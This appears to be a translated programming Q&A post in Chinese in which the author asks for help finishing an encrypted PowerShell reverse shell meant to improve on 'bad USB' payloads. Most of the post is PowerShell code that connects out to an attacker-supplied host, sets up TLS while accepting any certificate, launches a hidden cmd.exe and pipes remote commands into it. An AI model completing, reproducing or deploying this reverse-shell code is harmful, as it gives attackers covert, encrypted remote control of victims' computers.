powershell - 支持管道的反向 TLS powershell

问题描述

我知道 powershell 中有用于反向 TCP shell 的错误 USB 有效负载，但它们是原始的。通常只执行接收到的命令，当进程终止时，它会发回标准输出。当命令运行另一个 shell（如 diskpart netsh wmic ...etc）时，shell 会冻结，因为它正在等待命令进程完成，因为命令运行了另一个 shell，它只会一直等待，直到该 shell 的进程终止。这些反向 shell 不支持：提示、管道、加密、彩色文本、热键等

我正在尝试创建一个，但有一个问题。

$socket = new-object net.sockets.tcpclient($args[0],$args[1])
$tcpstream = $socket.getstream()
$tlsstream = new-object net.security.sslstream($tcpstream,$false,[net.security.remotecertificatevalidationcallback]{$true})
$tlsstream.authenticateasclient('')
$tlsstreamwriter = new-object io.streamwriter($tlsstream)
$tlsstreamwriter.autoflush = $true
$tlsstreamreader = new-object io.streamreader($tlsstream)
$shellinfo = new-object diagnostics.processstartinfo
$shellinfo.filename = 'cmd.exe'
$shellinfo.createnowindow = $true
$shellinfo.useshellexecute = $false
$shellinfo.redirectstandardoutput = $true
$shellinfo.redirectstandardinput = $true
$shell = new-object diagnostics.process
$shell.startinfo = $shellinfo
$shell.start()|out-null
$stdout = $shell.standardoutput
$stdin = $shell.standardinput
$stdout|gm
while($shell.hasexited -eq $false)
{
    # Code that send stdout to tlsstream
    # If I use $tlsstreamwriter.write($stdout.readline()) readline() method send back string of next line if there is no new line in stream it waits for new one, but that will freeze the shell. Is there a way to detect when is new data is written in the TLS stream so if is no new data it will break out of loop just waiting for new command to be received and piped to stdin.
    $stdin.writeline($tlsstreamreader.readline()) #Reads the line from the tlsstream and write it to the line in stdin.
}

标签： powershellshell